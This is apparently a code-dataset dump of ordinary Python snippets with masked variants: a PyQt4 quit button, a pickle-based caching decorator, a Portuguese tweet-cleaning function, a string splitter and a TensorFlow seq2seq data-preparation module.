QtCore.SIGNAL('clicked()'), QtGui.qApp, QtCore.\n SLOT('quit()'))\n\n\napp = QtGui.QApplication(sys.argv)\nqb = QuitButton()\nqb.show()\nsys.exit(app.exec_())\n", "step-5": "# -*- coding:utf-8 -*-\n'''\nCreated on 2016��4��8��\n\n@author: liping\n'''\n\nimport sys\nfrom PyQt4 import QtGui,QtCore\n\nclass QuitButton(QtGui.QWidget):\n def __init__(self,parent = None):\n QtGui.QWidget.__init__(self,parent)\n \n self.setGeometry(300,300,250,150)\n self.setWindowTitle('quitButton')\n \n quit = QtGui.QPushButton('Close',self)\n quit.setGeometry(100,100,60,35)\n \n self.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp,QtCore.SLOT('quit()'))\n \napp = QtGui.QApplication(sys.argv)\nqb = QuitButton()\nqb.show()\nsys.exit(app.exec_())", "step-ids": [ 1, 3, 4, 5, 6 ] }
[ 1, 3, 4, 5, 6 ]
""" Base cache mechanism """ import time import string import codecs import pickle from functools import wraps from abc import ABCMeta, abstractmethod from asyncio import iscoroutinefunction class BaseCache(metaclass=ABCMeta): """Base cache class.""" @abstractmethod def __init__(self, kvstore, makekey, lifetime, fail_silent): self._kvstore = kvstore self._makekey = makekey self._lifetime = lifetime self._fail_silent = fail_silent def __call__(self, func): @wraps(func) def wrapper(*args, **kwargs): """decorator.""" key = self._makekey(func, args, kwargs) if self._kvstore.exists(key): value_str = self._kvstore.get(key) try: value = pickle.loads(codecs.decode(value_str.encode(), "base64")) if self._lifetime is None or time.time() - value['time'] < self._lifetime: result = value['data'] return result except: # pylint: disable=W0702 if not self._fail_silent: raise result = func(*args, **kwargs) value = {'time': time.time(), 'data': result} value_str = codecs.encode(pickle.dumps(value), "base64").decode() self._kvstore.set(key, value_str) return result @wraps(func) async def async_wrapper(*args, **kwargs): """async decorator.""" key = self._makekey(func, args, kwargs) if self._kvstore.exists(key): value_str = self._kvstore.get(key) try: value = pickle.loads(codecs.decode(value_str.encode(), "base64")) if self._lifetime is None or time.time() - value['time'] < self._lifetime: result = value['data'] return result except: # pylint: disable=W0702 if not self._fail_silent: raise result = await func(*args, **kwargs) value = {'time': time.time(), 'data': result} value_str = codecs.encode(pickle.dumps(value), "base64").decode() self._kvstore.set(key, value_str) return result if iscoroutinefunction(func): return async_wrapper return wrapper @staticmethod def makekey(function, *args, **kwargs) -> str: """creates a unique key based to be used when storing the cache. :param function: function :param *args: positional args of the function :param **kwargs: keyword arguments of the function :return: string base64 key """ arguments = str((function.__name__, args, kwargs)).strip() arguments = arguments.translate( str.maketrans('', '', string.punctuation+string.whitespace) ) key = codecs.encode(pickle.dumps(arguments, protocol=0), "base64").decode().strip() return key
normal
{ "blob_id": "e810cde7f77d36c6a43f8c277b66d038b143aae6", "index": 6746, "step-1": "<mask token>\n\n\nclass BaseCache(metaclass=ABCMeta):\n <mask token>\n\n @abstractmethod\n def __init__(self, kvstore, makekey, lifetime, fail_silent):\n self._kvstore = kvstore\n self._makekey = makekey\n self._lifetime = lifetime\n self._fail_silent = fail_silent\n <mask token>\n\n @staticmethod\n def makekey(function, *args, **kwargs) ->str:\n \"\"\"creates a unique key based to be used when storing the cache.\n :param function: function\n :param *args: positional args of the function\n :param **kwargs: keyword arguments of the function\n :return: string base64 key\n \"\"\"\n arguments = str((function.__name__, args, kwargs)).strip()\n arguments = arguments.translate(str.maketrans('', '', string.\n punctuation + string.whitespace))\n key = codecs.encode(pickle.dumps(arguments, protocol=0), 'base64'\n ).decode().strip()\n return key\n", "step-2": "<mask token>\n\n\nclass BaseCache(metaclass=ABCMeta):\n <mask token>\n\n @abstractmethod\n def __init__(self, kvstore, makekey, lifetime, fail_silent):\n self._kvstore = kvstore\n self._makekey = makekey\n self._lifetime = lifetime\n self._fail_silent = fail_silent\n\n def __call__(self, func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n \"\"\"decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(),\n 'base64'))\n if self._lifetime is None or time.time() - value['time'\n ] < self._lifetime:\n result = value['data']\n return result\n except:\n if not self._fail_silent:\n raise\n result = func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), 'base64').decode()\n self._kvstore.set(key, value_str)\n return result\n\n @wraps(func)\n async def async_wrapper(*args, **kwargs):\n \"\"\"async decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(),\n 'base64'))\n if self._lifetime is None or time.time() - value['time'\n ] < self._lifetime:\n result = value['data']\n return result\n except:\n if not self._fail_silent:\n raise\n result = await func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), 'base64').decode()\n self._kvstore.set(key, value_str)\n return result\n if iscoroutinefunction(func):\n return async_wrapper\n return wrapper\n\n @staticmethod\n def makekey(function, *args, **kwargs) ->str:\n \"\"\"creates a unique key based to be used when storing the cache.\n :param function: function\n :param *args: positional args of the function\n :param **kwargs: keyword arguments of the function\n :return: string base64 key\n \"\"\"\n arguments = str((function.__name__, args, kwargs)).strip()\n arguments = arguments.translate(str.maketrans('', '', string.\n punctuation + string.whitespace))\n key = codecs.encode(pickle.dumps(arguments, protocol=0), 'base64'\n ).decode().strip()\n return key\n", "step-3": "<mask token>\n\n\nclass BaseCache(metaclass=ABCMeta):\n \"\"\"Base cache class.\"\"\"\n\n @abstractmethod\n def __init__(self, kvstore, makekey, lifetime, fail_silent):\n self._kvstore = kvstore\n self._makekey = makekey\n self._lifetime = lifetime\n self._fail_silent = fail_silent\n\n def __call__(self, func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n 
\"\"\"decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(),\n 'base64'))\n if self._lifetime is None or time.time() - value['time'\n ] < self._lifetime:\n result = value['data']\n return result\n except:\n if not self._fail_silent:\n raise\n result = func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), 'base64').decode()\n self._kvstore.set(key, value_str)\n return result\n\n @wraps(func)\n async def async_wrapper(*args, **kwargs):\n \"\"\"async decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(),\n 'base64'))\n if self._lifetime is None or time.time() - value['time'\n ] < self._lifetime:\n result = value['data']\n return result\n except:\n if not self._fail_silent:\n raise\n result = await func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), 'base64').decode()\n self._kvstore.set(key, value_str)\n return result\n if iscoroutinefunction(func):\n return async_wrapper\n return wrapper\n\n @staticmethod\n def makekey(function, *args, **kwargs) ->str:\n \"\"\"creates a unique key based to be used when storing the cache.\n :param function: function\n :param *args: positional args of the function\n :param **kwargs: keyword arguments of the function\n :return: string base64 key\n \"\"\"\n arguments = str((function.__name__, args, kwargs)).strip()\n arguments = arguments.translate(str.maketrans('', '', string.\n punctuation + string.whitespace))\n key = codecs.encode(pickle.dumps(arguments, protocol=0), 'base64'\n ).decode().strip()\n return key\n", "step-4": "<mask token>\nimport time\nimport string\nimport codecs\nimport pickle\nfrom functools import wraps\nfrom abc import ABCMeta, abstractmethod\nfrom asyncio import iscoroutinefunction\n\n\nclass BaseCache(metaclass=ABCMeta):\n \"\"\"Base cache class.\"\"\"\n\n @abstractmethod\n def __init__(self, kvstore, makekey, lifetime, fail_silent):\n self._kvstore = kvstore\n self._makekey = makekey\n self._lifetime = lifetime\n self._fail_silent = fail_silent\n\n def __call__(self, func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n \"\"\"decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(),\n 'base64'))\n if self._lifetime is None or time.time() - value['time'\n ] < self._lifetime:\n result = value['data']\n return result\n except:\n if not self._fail_silent:\n raise\n result = func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), 'base64').decode()\n self._kvstore.set(key, value_str)\n return result\n\n @wraps(func)\n async def async_wrapper(*args, **kwargs):\n \"\"\"async decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(),\n 'base64'))\n if self._lifetime is None or time.time() - value['time'\n ] < self._lifetime:\n result = value['data']\n return result\n except:\n if not self._fail_silent:\n raise\n result = await func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = 
codecs.encode(pickle.dumps(value), 'base64').decode()\n self._kvstore.set(key, value_str)\n return result\n if iscoroutinefunction(func):\n return async_wrapper\n return wrapper\n\n @staticmethod\n def makekey(function, *args, **kwargs) ->str:\n \"\"\"creates a unique key based to be used when storing the cache.\n :param function: function\n :param *args: positional args of the function\n :param **kwargs: keyword arguments of the function\n :return: string base64 key\n \"\"\"\n arguments = str((function.__name__, args, kwargs)).strip()\n arguments = arguments.translate(str.maketrans('', '', string.\n punctuation + string.whitespace))\n key = codecs.encode(pickle.dumps(arguments, protocol=0), 'base64'\n ).decode().strip()\n return key\n", "step-5": "\"\"\"\nBase cache mechanism\n\"\"\"\nimport time\nimport string\nimport codecs\nimport pickle\nfrom functools import wraps\nfrom abc import ABCMeta, abstractmethod\nfrom asyncio import iscoroutinefunction\n\n\nclass BaseCache(metaclass=ABCMeta):\n \"\"\"Base cache class.\"\"\"\n @abstractmethod\n def __init__(self, kvstore, makekey, lifetime, fail_silent):\n self._kvstore = kvstore\n self._makekey = makekey\n self._lifetime = lifetime\n self._fail_silent = fail_silent\n\n def __call__(self, func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n \"\"\"decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(), \"base64\"))\n if self._lifetime is None or time.time() - value['time'] < self._lifetime:\n result = value['data']\n return result\n except: # pylint: disable=W0702\n if not self._fail_silent:\n raise\n\n result = func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), \"base64\").decode()\n self._kvstore.set(key, value_str)\n\n return result\n\n @wraps(func)\n async def async_wrapper(*args, **kwargs):\n \"\"\"async decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(), \"base64\"))\n if self._lifetime is None or time.time() - value['time'] < self._lifetime:\n result = value['data']\n return result\n except: # pylint: disable=W0702\n if not self._fail_silent:\n raise\n\n result = await func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), \"base64\").decode()\n self._kvstore.set(key, value_str)\n\n return result\n\n if iscoroutinefunction(func):\n return async_wrapper\n return wrapper\n\n @staticmethod\n def makekey(function, *args, **kwargs) -> str:\n \"\"\"creates a unique key based to be used when storing the cache.\n :param function: function\n :param *args: positional args of the function\n :param **kwargs: keyword arguments of the function\n :return: string base64 key\n \"\"\"\n arguments = str((function.__name__, args, kwargs)).strip()\n arguments = arguments.translate(\n str.maketrans('', '', string.punctuation+string.whitespace)\n )\n key = codecs.encode(pickle.dumps(arguments, protocol=0), \"base64\").decode().strip()\n return key\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
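The record above captures an abstract decorator-style cache. A minimal sketch of wiring it up, not part of the record: DictStore and DictCache are hypothetical names, and the exists/get/set interface is inferred from the calls BaseCache makes on its kvstore.

# Hypothetical wiring for the BaseCache in the record above (not part of the
# dataset record); the store interface is inferred from BaseCache's calls.
class DictStore:
    """In-memory key-value store with the interface BaseCache expects."""

    def __init__(self):
        self._data = {}

    def exists(self, key):
        return key in self._data

    def get(self, key):
        return self._data[key]

    def set(self, key, value):
        self._data[key] = value


class DictCache(BaseCache):
    """Concrete cache: dict-backed store, default key maker."""

    def __init__(self, lifetime=None, fail_silent=True):
        super().__init__(DictStore(), BaseCache.makekey, lifetime, fail_silent)


@DictCache(lifetime=60)  # cache results for 60 seconds
def slow_square(x):
    return x * x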
import re

import nltk

tw_dict = {'created_at': [], 'id': [], 'id_str': [], 'full_text': [],
           'entities': [], 'source': [], 'user': [], 'lang': []}

def Preprocessing(instancia):
    # Remove unwanted characters: hashtags, mentions, and punctuation.
    instancia = re.sub(r"#\S+", "", instancia)
    instancia = re.sub(r"@\S+", "", instancia).lower().replace('.', '').replace(';', '').replace('-', '').replace(':', '').replace(')', '').replace('"', '').replace(',', '')
    # Drop frequent terms (stopwords) that carry no relevance in the data.
    stopwords = set(nltk.corpus.stopwords.words('portuguese'))
    palavras = [i for i in instancia.split() if i not in stopwords]
    return " ".join(palavras)
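A quick usage sketch for Preprocessing: the tweet is invented, and the expected output assumes the standard nltk Portuguese stopword list.

# Hypothetical tweet; requires a one-time nltk.download('stopwords').
print(Preprocessing("Eu adorei o novo episódio #serie @amigo"))
# Expected: "adorei novo episódio" -- hashtag and mention stripped,
# the stopwords "eu" and "o" dropped after lowercasing.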
normal
{ "blob_id": "bffd211a2d2dc3dd9b596f69909be7f0437ab0c8", "index": 9322, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef Preprocessing(instancia):\n instancia = re.sub('#\\\\S+', '', instancia)\n instancia = re.sub('@\\\\S+', '', instancia).lower().replace('.', ''\n ).replace(';', '').replace('-', '').replace(':', '').replace(')', ''\n ).replace('\"', '').replace(',', '')\n stopwords = set(nltk.corpus.stopwords.words('portuguese'))\n palavras = [i for i in instancia.split() if not i in stopwords]\n return ' '.join(palavras)\n", "step-3": "<mask token>\ntw_dict = {'created_at': [], 'id': [], 'id_str': [], 'full_text': [],\n 'entities': [], 'source': [], 'user': [], 'lang': []}\n\n\ndef Preprocessing(instancia):\n instancia = re.sub('#\\\\S+', '', instancia)\n instancia = re.sub('@\\\\S+', '', instancia).lower().replace('.', ''\n ).replace(';', '').replace('-', '').replace(':', '').replace(')', ''\n ).replace('\"', '').replace(',', '')\n stopwords = set(nltk.corpus.stopwords.words('portuguese'))\n palavras = [i for i in instancia.split() if not i in stopwords]\n return ' '.join(palavras)\n", "step-4": "import nltk\ntw_dict = {'created_at': [], 'id': [], 'id_str': [], 'full_text': [],\n 'entities': [], 'source': [], 'user': [], 'lang': []}\n\n\ndef Preprocessing(instancia):\n instancia = re.sub('#\\\\S+', '', instancia)\n instancia = re.sub('@\\\\S+', '', instancia).lower().replace('.', ''\n ).replace(';', '').replace('-', '').replace(':', '').replace(')', ''\n ).replace('\"', '').replace(',', '')\n stopwords = set(nltk.corpus.stopwords.words('portuguese'))\n palavras = [i for i in instancia.split() if not i in stopwords]\n return ' '.join(palavras)\n", "step-5": "import nltk\n\ntw_dict = {'created_at':[],\n 'id':[],\n 'id_str':[],\n 'full_text':[],\n 'entities':[],\n 'source':[],\n 'user':[],\n 'lang':[]}\n\ndef Preprocessing(instancia):\n # Remove caracteres indesejados.\n instancia = re.sub(r\"#\\S+\", \"\", instancia)\n instancia = re.sub(r\"@\\S+\", \"\", instancia).lower().replace('.','').replace(';','').replace('-','').replace(':','').replace(')','').replace('\"','').replace(',','')\n # Removendo palavras e termos frequentes que não tem relevância nos dados.\n stopwords = set(nltk.corpus.stopwords.words('portuguese'))\n palavras = [i for i in instancia.split() if not i in stopwords]\n return (\" \".join(palavras))", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# Read the number of test cases; int() is the safe choice over eval() here.
t = int(input())
while t:
    t -= 1
    y = []  # characters at even indices
    z = []  # characters at odd indices
    x = input()  # input() already returns a str; no str() wrapper needed
    for i in range(len(x)):
        if i % 2 == 0:
            y.append(x[i])
        else:
            z.append(x[i])
    print("".join(y) + " " + "".join(z))
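A sample run of the snippet above, which prints the even-indexed characters of each string, a space, then the odd-indexed ones:

# Sample session (first input line is the number of test cases):
#   input:   2
#            CODING
#            PYTHON
#   output:  CDN OIG
#            PTO YHN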
normal
{ "blob_id": "ac32fb5fcd71790f9dbf0794992a9dc92a202c9b", "index": 7972, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile t:\n t -= 1\n y = []\n z = []\n x = str(input())\n for i in range(len(x)):\n if not int(i) % 2:\n y.append(x[i])\n else:\n z.append(x[i])\n print(''.join(y) + ' ' + ''.join(z))\n", "step-3": "t = eval(input())\nwhile t:\n t -= 1\n y = []\n z = []\n x = str(input())\n for i in range(len(x)):\n if not int(i) % 2:\n y.append(x[i])\n else:\n z.append(x[i])\n print(''.join(y) + ' ' + ''.join(z))\n", "step-4": "t = eval(input())\nwhile t:\n t -= 1\n y = []\n z = []\n x = str(input())\n for i in range(len(x)):\n if (not int(i)%2):\n y.append(x[i])\n else:\n z.append(x[i])\n print(\"\".join(y) + \" \" + \"\".join(z))\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import os
import re
import json

from tensorflow.python.platform import gfile
import tensorflow as tf

# Special vocabulary symbols - we always put them at the start.
_PAD = b"_PAD"
_GO = b"_GO"
_EOS = b"_EOS"
_UNK = b"_UNK"
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]

PAD_ID = 0
GO_ID = 1
EOS_ID = 2
UNK_ID = 3

# Regular expressions used to tokenize.
_WORD_SPLIT = re.compile(b"([.,!?\"':;)(])")
_DIGIT_RE = re.compile(br"\d")


def get_qa_set(directory, jsonl_file):
    """Split a jsonl QA corpus into .src/.targ files in directory unless they're there."""
    set_name = os.path.splitext(os.path.basename(jsonl_file))[0]
    set_path = os.path.join(directory, set_name)
    src_path = set_path + '.src'
    targ_path = set_path + '.targ'
    if gfile.Exists(src_path) and gfile.Exists(targ_path):
        return set_path
    with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(targ_path, 'w') as targfile:
        for line in qafile:
            lcontent = json.loads(line)
            srcfile.write(lcontent['q'].replace('\n', '') + '\n')
            targfile.write(lcontent['a'].replace('\n', '') + '\n')
    return set_path


def basic_tokenizer(sentence):
    """Very basic tokenizer: split the sentence into a list of tokens."""
    words = []
    for space_separated_fragment in sentence.strip().split():
        words.extend(_WORD_SPLIT.split(space_separated_fragment))
    return [w for w in words if w]


def create_vocabulary(vocabulary_path, json_vocab_path):
    """Create vocabulary file (if it does not exist yet) from a BPE json vocab.

    The json file is expected to hold a 'w2id' mapping from token to id.
    Tokens are sorted by their ids, the special symbols in _START_VOCAB are
    prepended, and the result is written to vocabulary_path in a
    one-token-per-line format, so that the token in the first line gets id=0,
    the token in the second line gets id=1, and so on.

    Args:
      vocabulary_path: path where the vocabulary will be created.
      json_vocab_path: json data file that will be used to create vocabulary.
    """
    if not gfile.Exists(vocabulary_path):
        print("Transform vocabulary to %s" % vocabulary_path)
        with gfile.GFile(json_vocab_path, mode="rb") as f:
            jvocab = json.load(f)
            vocab = jvocab['w2id']
            vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)
            with gfile.GFile(vocabulary_path, mode="wb") as vocab_file:
                for w in vocab_list:
                    # json keys are str while _START_VOCAB holds bytes; encode
                    # uniformly so the bytes newline concatenates cleanly.
                    vocab_file.write(tf.compat.as_bytes(w) + b"\n")


def initialize_vocabulary(vocabulary_path):
    """Initialize vocabulary from file.

    We assume the vocabulary is stored one-item-per-line, so a file:
      dog
      cat
    will result in a vocabulary {"dog": 0, "cat": 1}, and this function will
    also return the reversed-vocabulary ["dog", "cat"].

    Args:
      vocabulary_path: path to the file containing the vocabulary.

    Returns:
      a pair: the vocabulary (a dictionary mapping string to integers), and
      the reversed vocabulary (a list, which reverses the vocabulary mapping).

    Raises:
      ValueError: if the provided vocabulary_path does not exist.
    """
    if gfile.Exists(vocabulary_path):
        rev_vocab = []
        with gfile.GFile(vocabulary_path, mode="rb") as f:
            rev_vocab.extend(f.readlines())
        rev_vocab = [line.strip() for line in rev_vocab]
        vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])
        return vocab, rev_vocab
    else:
        raise ValueError("Vocabulary file %s not found." % vocabulary_path)


def sentence_to_token_ids(sentence, vocabulary):
    """Convert a string to list of integers representing token-ids.

    For example, a sentence "I have a dog" may become tokenized into
    ["I", "have", "a", "dog"] and with vocabulary {"I": 1, "have": 2,
    "a": 4, "dog": 7} this function will return [1, 2, 4, 7].

    Args:
      sentence: the sentence in bytes format to convert to token-ids.
      vocabulary: a dictionary mapping tokens to integers.

    Returns:
      a list of integers, the token-ids for the sentence.
    """
    return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]


def data_to_token_ids(data_path, target_path, vocabulary_path):
    """Tokenize data file and turn into token-ids using given vocabulary file.

    This function loads data line-by-line from data_path, calls the above
    sentence_to_token_ids, and saves the result to target_path. See comment
    for sentence_to_token_ids on the details of token-ids format.

    Args:
      data_path: path to the data file in one-sentence-per-line format.
      target_path: path where the file with token-ids will be created.
      vocabulary_path: path to the vocabulary file.
    """
    if not gfile.Exists(target_path):
        print("Tokenizing data in %s" % data_path)
        vocab, _ = initialize_vocabulary(vocabulary_path)
        with gfile.GFile(data_path, mode="rb") as data_file:
            with gfile.GFile(target_path, mode="w") as tokens_file:
                counter = 0
                for line in data_file:
                    counter += 1
                    if counter % 100000 == 0:
                        print("  tokenizing line %d" % counter)
                    token_ids = sentence_to_token_ids(tf.compat.as_bytes(line), vocab)
                    tokens_file.write(" ".join([str(tok) for tok in token_ids]) + "\n")


def prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file):
    """Split the jsonl QA data into data_dir, build the vocabulary and tokenize.

    Args:
      data_dir: directory in which the data sets will be stored.
      train_data_file: jsonl data file.
      dev_data_file: jsonl data file.
      vocab_file: bpe json vocab.

    Returns:
      A tuple of 5 elements:
        (1) path to the token-ids for src training data-set,
        (2) path to the token-ids for target training data-set,
        (3) path to the token-ids for src development data-set,
        (4) path to the token-ids for target development data-set,
        (5) path to the vocabulary file.
    """
    if not gfile.Exists(data_dir):
        gfile.MkDir(data_dir)

    # Split the jsonl QA data into src/targ files in the specified directory.
    train_path = get_qa_set(data_dir, train_data_file)
    dev_path = get_qa_set(data_dir, dev_data_file)

    # Create the vocabulary from the BPE json vocab.
    vocab_path = os.path.join(data_dir, "vocab.txt")
    create_vocabulary(vocab_path, vocab_file)

    # Create token ids for the training data.
    src_train_ids_path = train_path + ".src.ids"
    targ_train_ids_path = train_path + ".targ.ids"
    data_to_token_ids(train_path + ".src", src_train_ids_path, vocab_path)
    data_to_token_ids(train_path + ".targ", targ_train_ids_path, vocab_path)

    # Create token ids for the development data.
    src_dev_ids_path = dev_path + ".src.ids"
    targ_dev_ids_path = dev_path + ".targ.ids"
    data_to_token_ids(dev_path + ".src", src_dev_ids_path, vocab_path)
    data_to_token_ids(dev_path + ".targ", targ_dev_ids_path, vocab_path)

    return (src_train_ids_path, targ_train_ids_path,
            src_dev_ids_path, targ_dev_ids_path,
            vocab_path)
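A minimal driver sketch for the module above, not taken from the record: the paths are placeholders, each jsonl line is assumed to hold a {"q": ..., "a": ...} object, and the vocab json a 'w2id' mapping.

# Hypothetical driver; all paths are placeholders.
paths = prepare_jsonlbpe_data(
    data_dir='data/qa',                 # created if missing
    train_data_file='raw/train.jsonl',  # one {"q": ..., "a": ...} per line
    dev_data_file='raw/dev.jsonl',
    vocab_file='raw/bpe_vocab.json',    # json with a 'w2id' token-to-id mapping
)
src_train_ids, targ_train_ids, src_dev_ids, targ_dev_ids, vocab_path = paths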
normal
{ "blob_id": "bf51da12632013c62aa543ae7f02415057138c7a", "index": 694, "step-1": "<mask token>\n\n\ndef get_qa_set(directory, jsonl_file):\n \"\"\"Download the WMT en-fr training corpus to directory unless it's there.\"\"\"\n set_name = os.path.splitext(os.path.basename(jsonl_file))[0]\n set_path = os.path.join(directory, set_name)\n src_path = set_path + '.src'\n targ_path = set_path + '.targ'\n if gfile.Exists(src_path) and gfile.Exists(targ_path):\n return set_path\n with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(\n targ_path, 'w') as targfile:\n for line in qafile:\n lcontent = json.loads(line)\n srcfile.write(lcontent['q'].replace('\\n', '') + '\\n')\n targfile.write(lcontent['a'].replace('\\n', '') + '\\n')\n return set_path\n\n\n<mask token>\n\n\ndef prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file\n ):\n \"\"\"Get WMT data into data_dir, create vocabularies and tokenize data.\n\n Args:\n data_dir: directory in which the data sets will be stored.\n train_data_file: jsonl data file.\n dev_data_file: jsonl data file.\n vocab_file: bpe json vocab\n\n Returns:\n A tuple of 6 elements:\n (1) path to the token-ids for src training data-set,\n (2) path to the token-ids for target training data-set,\n (3) path to the token-ids for src development data-set,\n (4) path to the token-ids for src development data-set,\n (5) path to the src vocabulary file,\n (6) path to the src vocabulary file.\n \"\"\"\n if not gfile.Exists(data_dir):\n gfile.MkDir(data_dir)\n train_path = get_qa_set(data_dir, train_data_file)\n dev_path = get_qa_set(data_dir, dev_data_file)\n vocab_path = os.path.join(data_dir, 'vocab.txt')\n create_vocabulary(vocab_path, vocab_file)\n src_train_ids_path = train_path + '.src.ids'\n targ_train_ids_path = train_path + '.targ.ids'\n data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)\n data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)\n src_dev_ids_path = dev_path + '.src.ids'\n targ_dev_ids_path = dev_path + '.targ.ids'\n data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)\n data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)\n return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,\n targ_dev_ids_path, vocab_path)\n", "step-2": "<mask token>\n\n\ndef get_qa_set(directory, jsonl_file):\n \"\"\"Download the WMT en-fr training corpus to directory unless it's there.\"\"\"\n set_name = os.path.splitext(os.path.basename(jsonl_file))[0]\n set_path = os.path.join(directory, set_name)\n src_path = set_path + '.src'\n targ_path = set_path + '.targ'\n if gfile.Exists(src_path) and gfile.Exists(targ_path):\n return set_path\n with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(\n targ_path, 'w') as targfile:\n for line in qafile:\n lcontent = json.loads(line)\n srcfile.write(lcontent['q'].replace('\\n', '') + '\\n')\n targfile.write(lcontent['a'].replace('\\n', '') + '\\n')\n return set_path\n\n\ndef basic_tokenizer(sentence):\n \"\"\"Very basic tokenizer: split the sentence into a list of tokens.\"\"\"\n words = []\n for space_separated_fragment in sentence.strip().split():\n words.extend(_WORD_SPLIT.split(space_separated_fragment))\n return [w for w in words if w]\n\n\n<mask token>\n\n\ndef prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file\n ):\n \"\"\"Get WMT data into data_dir, create vocabularies and tokenize data.\n\n Args:\n data_dir: directory in which the data sets will be stored.\n 
train_data_file: jsonl data file.\n dev_data_file: jsonl data file.\n vocab_file: bpe json vocab\n\n Returns:\n A tuple of 6 elements:\n (1) path to the token-ids for src training data-set,\n (2) path to the token-ids for target training data-set,\n (3) path to the token-ids for src development data-set,\n (4) path to the token-ids for src development data-set,\n (5) path to the src vocabulary file,\n (6) path to the src vocabulary file.\n \"\"\"\n if not gfile.Exists(data_dir):\n gfile.MkDir(data_dir)\n train_path = get_qa_set(data_dir, train_data_file)\n dev_path = get_qa_set(data_dir, dev_data_file)\n vocab_path = os.path.join(data_dir, 'vocab.txt')\n create_vocabulary(vocab_path, vocab_file)\n src_train_ids_path = train_path + '.src.ids'\n targ_train_ids_path = train_path + '.targ.ids'\n data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)\n data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)\n src_dev_ids_path = dev_path + '.src.ids'\n targ_dev_ids_path = dev_path + '.targ.ids'\n data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)\n data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)\n return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,\n targ_dev_ids_path, vocab_path)\n", "step-3": "<mask token>\n\n\ndef get_qa_set(directory, jsonl_file):\n \"\"\"Download the WMT en-fr training corpus to directory unless it's there.\"\"\"\n set_name = os.path.splitext(os.path.basename(jsonl_file))[0]\n set_path = os.path.join(directory, set_name)\n src_path = set_path + '.src'\n targ_path = set_path + '.targ'\n if gfile.Exists(src_path) and gfile.Exists(targ_path):\n return set_path\n with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(\n targ_path, 'w') as targfile:\n for line in qafile:\n lcontent = json.loads(line)\n srcfile.write(lcontent['q'].replace('\\n', '') + '\\n')\n targfile.write(lcontent['a'].replace('\\n', '') + '\\n')\n return set_path\n\n\ndef 